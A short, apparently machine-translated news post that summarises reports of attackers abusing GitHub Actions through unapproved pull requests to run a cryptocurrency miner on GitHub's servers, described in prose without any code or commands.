An attack that uses GitHub's server for crypto asset mining was found, and GitHub Actions was abused



It turned out that GitHub's server is being used for crypto asset (virtual currency) mining by exploiting

'GitHub Actions' that automates software workflow.

GitHub Actions being actively abused to mine cryptocurrency on GitHub servers
https://www.bleepingcomputer.com/news/security/github-actions-being-actively-abused-to-mine-cryptocurrency-on-github-servers/



News site Bleeping Computer reports that the attack began by forking a legitimate repository that enabled GitHub Actions, then inserting malicious code into the forked version. It then submits a pull request to the maintainers of the original repository to merge and return the code.

The screenshot of the repository that was actually attacked looks like this.



According to Justin Perdok, who reported the attack, the trigger for the attack was 'submit a pull request' and the pull request does not need to be approved.

According to Bleeping Computer, a malicious pull request asks GitHub's server to download 'npm.exe' hosted on GitLab. This 'npm.exe' is a mining program that has nothing to do with the Node.js installer or Node Package Manager, and it executes mining via the arguments and wallet address provided by the attacker.

In the past, there was an attack that exploited the infrastructure of GitHub via GitHub Actions, and a botnet was hosted, but this attack seems to be just using the server for mining. Has been done.

in Web Service,   Security, Posted by logc_nt